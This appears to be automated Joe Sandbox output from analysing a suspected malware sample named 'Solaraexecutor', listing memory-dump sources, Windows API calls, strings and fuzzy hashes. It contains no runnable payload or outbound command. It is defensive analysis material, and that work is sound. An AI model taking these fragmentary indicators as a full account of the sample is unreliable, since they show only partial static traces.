                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                      • API String ID: 0-56093855
                                                      • Opcode ID: 697e999d60607a01bdd98e7b9ffcfe081873be5716a2f763471754d662e03326
                                                      • Instruction ID: 4e200c5ff4db75ef60c12f187fdf1244a56b114834a65fdecd3eca031e425449
                                                      • Opcode Fuzzy Hash: 697e999d60607a01bdd98e7b9ffcfe081873be5716a2f763471754d662e03326
                                                      • Instruction Fuzzy Hash: 7901847A604345AFDB118F68FC44A567BAAF709394F040425F806D3330DA71D890EFB1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                      • Instruction ID: 1e348db7c68f204a8804f8c106f544d38270c6acbea20614d9a2e67217530b0c
                                                      • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                      • Instruction Fuzzy Hash: D4A12572A043869FEB21CF2AC8E17AFFBE5EF55310F1841ADE8959B281C6349941C770
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00D27F69,?,?,?), ref: 00D2A3FA
                                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00D27F69,?), ref: 00D2A43E
                                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00D27F69,?,?,?,?,?,?,?), ref: 00D2A4BF
                                                      • CloseHandle.KERNEL32(?,?,?,00000800,?,00D27F69,?,?,?,?,?,?,?,?,?,?), ref: 00D2A4C6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File$Create$CloseHandleTime
                                                      • String ID:
                                                      • API String ID: 2287278272-0
                                                      • Opcode ID: 9d55b5940606eedc9d062ea32e62e12414cd2d8dd3d1732b8f3fa5b86d85d987
                                                      • Instruction ID: 3ddbb6c4f082df83f570b11f0d2b2950d8da35edf0beaab78876bea8b60ca381
                                                      • Opcode Fuzzy Hash: 9d55b5940606eedc9d062ea32e62e12414cd2d8dd3d1732b8f3fa5b86d85d987
                                                      • Instruction Fuzzy Hash: E541C1301483919BD721EF68EC45F9EBBE4DBA0308F080919B5E4D31C0D6A4DA4C9B73
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
                                                      • API String ID: 176396367-0
                                                      • Opcode ID: 7e9914e37107c8a98fccc655aef3bbb481048dfa154521afba95deb6002904b6
                                                      • Instruction ID: 8c1d96bc65e4256e7769797426c2c84edfda8870a6a5453658bb023d12405c16
                                                      • Opcode Fuzzy Hash: 7e9914e37107c8a98fccc655aef3bbb481048dfa154521afba95deb6002904b6
                                                      • Instruction Fuzzy Hash: 0341F57190066A9BCB219F68DC0A9EF7BB8EF11710F044029FD46F7245DB30AE488BB4
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D491E0,?,00000000,?,00000001,?,?,00000001,00D491E0,?), ref: 00D4C9D5
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D4CA5E
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D46CBE,?), ref: 00D4CA70
                                                      • __freea.LIBCMT ref: 00D4CA79
                                                        • Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: cd58df5bab141d5abf98e70287d3993c6ebf4f1fa26b644bca00093eb2124abe
                                                      • Instruction ID: 84951b4f1400669cce003d3c677a4824f8ca9017dcdffa8952ab3e5fbc12406d
                                                      • Opcode Fuzzy Hash: cd58df5bab141d5abf98e70287d3993c6ebf4f1fa26b644bca00093eb2124abe
                                                      • Instruction Fuzzy Hash: 7831B072A1121AABDF25DF74CC42DAE7BA5EB01350F084128FC04E6250EB35CD50CBB0
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00D3A666
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D3A675
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D3A683
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00D3A691
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Release
                                                      • String ID:
                                                      • API String ID: 1035833867-0
                                                      • Opcode ID: 73854c40de88086c518a536a3151a24547de013c9b03a04f3b041a6b6b79c765
                                                      • Instruction ID: 40d1077e2f4f8f1e382f917df3f2b0e7c880a1cea09536bf00e158bc9a14b069
                                                      • Opcode Fuzzy Hash: 73854c40de88086c518a536a3151a24547de013c9b03a04f3b041a6b6b79c765
                                                      • Instruction Fuzzy Hash: 8EE0EC31962B21A7D2615F65AC0EF8A3E54EB05F52F050201FA09EA3D0DBA486008BB1
                                                      APIs
                                                        • Part of subcall function 00D3A699: GetDC.USER32(00000000), ref: 00D3A69D
                                                        • Part of subcall function 00D3A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D3A6A8
                                                        • Part of subcall function 00D3A699: ReleaseDC.USER32(00000000,00000000), ref: 00D3A6B3
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00D3A83C
                                                        • Part of subcall function 00D3AAC9: GetDC.USER32(00000000), ref: 00D3AAD2
                                                        • Part of subcall function 00D3AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00D3AB01
                                                        • Part of subcall function 00D3AAC9: ReleaseDC.USER32(00000000,?), ref: 00D3AB99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ObjectRelease$CapsDevice
                                                      • String ID: (
                                                      • API String ID: 1061551593-3887548279
                                                      • Opcode ID: 17fa2f0c25f9f5b033a46f50738dc80d9341f7435adfc22f3d7d35bf30ed5f58
                                                      • Instruction ID: 4dd5daffb2c953cb6bd4e0c3117e94a0cfd8b4b770008079184aa477e38e0819
                                                      • Opcode Fuzzy Hash: 17fa2f0c25f9f5b033a46f50738dc80d9341f7435adfc22f3d7d35bf30ed5f58
                                                      • Instruction Fuzzy Hash: B891F071608754AFD711DF29C844A2BBBE8FFC9741F00491EF99AD7220DB30A946CB62
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D275E3
                                                        • Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0
                                                        • Part of subcall function 00D2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2A598
                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D2777F
                                                        • Part of subcall function 00D2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A501
                                                        • Part of subcall function 00D2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A532
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                      • String ID: :
                                                      • API String ID: 3226429890-336475711
                                                      • Opcode ID: d6ad0fd49d019c1290f827098b162cbdf82535e72542bd4b1d200647f3282139
                                                      • Instruction ID: eb7078034e25de1f6fcd7d877f0d2b2ec7410378928d33c0b70be9196312a8d2
                                                      • Opcode Fuzzy Hash: d6ad0fd49d019c1290f827098b162cbdf82535e72542bd4b1d200647f3282139
                                                      • Instruction Fuzzy Hash: B2418471801268AAEB35EB64DC55EEEB77DEF61304F0440D6B605A3092DB745F89CB70
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: }
                                                      • API String ID: 176396367-4239843852
                                                      • Opcode ID: 767835bc3a48449f122e31fcbee3a7fec0a7bd039d2f34eed1f40d488f36926f
                                                      • Instruction ID: 7557d2f2e8cc3d9eddb4b1b5b9940830b6910303c5fcb51a09e67551da77932c
                                                      • Opcode Fuzzy Hash: 767835bc3a48449f122e31fcbee3a7fec0a7bd039d2f34eed1f40d488f36926f
                                                      • Instruction Fuzzy Hash: A121DE7290531A5ADB31EA68D845B6EB3ECDF91764F08082BF680C3241EB64DD4883B2
                                                      APIs
                                                        • Part of subcall function 00D2F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D2F2E4
                                                        • Part of subcall function 00D2F2C5: GetProcAddress.KERNEL32(00D681C8,CryptUnprotectMemory), ref: 00D2F2F4
                                                      • GetCurrentProcessId.KERNEL32(?,?,?,00D2F33E), ref: 00D2F3D2
                                                      Strings
                                                      • CryptProtectMemory failed, xrefs: 00D2F389
                                                      • CryptUnprotectMemory failed, xrefs: 00D2F3CA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$CurrentProcess
                                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                      • API String ID: 2190909847-396321323
                                                      • Opcode ID: d04596d54622d7e24e2dc078ebce20bf502ad5c4d34a5ed6d197376b331965a3
                                                      • Instruction ID: a2dfbba1e4729ea99bc8caf294cb9933bda1c03f02bfaa5e02077c9dd8155aa7
                                                      • Opcode Fuzzy Hash: d04596d54622d7e24e2dc078ebce20bf502ad5c4d34a5ed6d197376b331965a3
                                                      • Instruction Fuzzy Hash: 8A11E432A00739ABDF11AB24E84166E3B64FF25768B084635FC419B351DA74DD0596B4
                                                      APIs
                                                      • _swprintf.LIBCMT ref: 00D2B9B8
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: __vswprintf_c_l_swprintf
                                                      • String ID: %c:\
                                                      • API String ID: 1543624204-3142399695
                                                      • Opcode ID: 24447e521778240c315a6ba6db3bbe1c5216fd6e9318bf8c881395a39796e858
                                                      • Instruction ID: d1879d7955927b21603bbdbefbac518f9356e2c5c65628a359ad461cc276371b
                                                      • Opcode Fuzzy Hash: 24447e521778240c315a6ba6db3bbe1c5216fd6e9318bf8c881395a39796e858
                                                      • Instruction Fuzzy Hash: 6B0145631043216ADA306B35AC86D3BB7ACEFA5774B44440BF584D6082EBA0E84486B1
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00010000,00D31160,?,00000000,00000000), ref: 00D31043
                                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 00D3108A
                                                        • Part of subcall function 00D26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D26C54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreatePriority__vswprintf_c_l
                                                      • String ID: CreateThread failed
                                                      • API String ID: 2655393344-3849766595
                                                      • Opcode ID: f1996c985b93321133902941566813b0cc9ac048bec5374759d490bf26e4eab0
                                                      • Instruction ID: 09b3a235631e67fc9dab531591ecb1f56021f58e810d2fe680ffd9ad2cf77443
                                                      • Opcode Fuzzy Hash: f1996c985b93321133902941566813b0cc9ac048bec5374759d490bf26e4eab0
                                                      • Instruction Fuzzy Hash: CC01FE7934430A6FD7346F68AC51B76B398EB50755F24042DF946923C0CEA1A8855634
                                                      APIs
                                                        • Part of subcall function 00D2E2E8: _swprintf.LIBCMT ref: 00D2E30E
                                                        • Part of subcall function 00D2E2E8: _strlen.LIBCMT ref: 00D2E32F
                                                        • Part of subcall function 00D2E2E8: SetDlgItemTextW.USER32(?,00D5E274,?), ref: 00D2E38F
                                                        • Part of subcall function 00D2E2E8: GetWindowRect.USER32(?,?), ref: 00D2E3C9
                                                        • Part of subcall function 00D2E2E8: GetClientRect.USER32(?,?), ref: 00D2E3D5
                                                      • GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                      • SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                      • String ID: 0
                                                      • API String ID: 2622349952-4108050209
                                                      • Opcode ID: f981d3c12f0971ed6323f5d83fca7fbb72b0658e97821aecd1ac01349df5836c
                                                      • Instruction ID: bcd01b36887c1012d101342f956c4a46aec4a4f9ad95d9c3e544d31dc9b7904d
                                                      • Opcode Fuzzy Hash: f981d3c12f0971ed6323f5d83fca7fbb72b0658e97821aecd1ac01349df5836c
                                                      • Instruction Fuzzy Hash: 29F081351043A8AADF154F90A80D6A93B5BAF30748F098114FC4990691DB74C994AB30
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,00D31206,?), ref: 00D30FEA
                                                      • GetLastError.KERNEL32(?), ref: 00D30FF6
                                                        • Part of subcall function 00D26C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D26C54
                                                      Strings
                                                      • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D30FFF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                      • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                      • API String ID: 1091760877-2248577382
                                                      • Opcode ID: f691e8ea9e429dece29533f60e2e56dbc31dfd581c27f7f027b0df4cccb1df4d
                                                      • Instruction ID: e3364a6291c515723ee648aca85d1072ba74752c37598828d1b213e644008973
                                                      • Opcode Fuzzy Hash: f691e8ea9e429dece29533f60e2e56dbc31dfd581c27f7f027b0df4cccb1df4d
                                                      • Instruction Fuzzy Hash: 04D02E365083303BCB103728AC0AD6F3C04CB32B73F640B14F838A03F6CA208991A2B2
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00D2DA55,?), ref: 00D2E2A3
                                                      • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D2DA55,?), ref: 00D2E2B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FindHandleModuleResource
                                                      • String ID: RTL
                                                      • API String ID: 3537982541-834975271
                                                      • Opcode ID: 3262a5ea41cdf8ed56bbeb043b62743ec60b09cbe8524bedbd41ef9e441f469f
                                                      • Instruction ID: 1df5bcb7f9d78ad5277546cb0a8a23fedbc9d99930346ba9b4374573e93e77c1
                                                      • Opcode Fuzzy Hash: 3262a5ea41cdf8ed56bbeb043b62743ec60b09cbe8524bedbd41ef9e441f469f
                                                      • Instruction Fuzzy Hash: DAC012312407106BEA305B797C0DB47AA585B10B96F09044CB941E92D1D6A5C54486B0

                                                      Execution Graph

                                                      Execution Coverage:6.6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:3
                                                      Total number of Limit Nodes:0
                                                      execution_graph 12203 7ffd9beab7a1 12204 7ffd9beab816 QueryFullProcessImageNameA 12203->12204 12206 7ffd9beab964 12204->12206

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Z_H
                                                      • API String ID: 0-3267294416
                                                      • Opcode ID: a5994e55ae4cf3b6d6ab0545f4a040de1d5c2c85d218793611956b808a7cb30c
                                                      • Instruction ID: 9de61211aa087f9c77dedc185f3da73d2c540404fda1e3d4423527c3521ad490
                                                      • Opcode Fuzzy Hash: a5994e55ae4cf3b6d6ab0545f4a040de1d5c2c85d218793611956b808a7cb30c
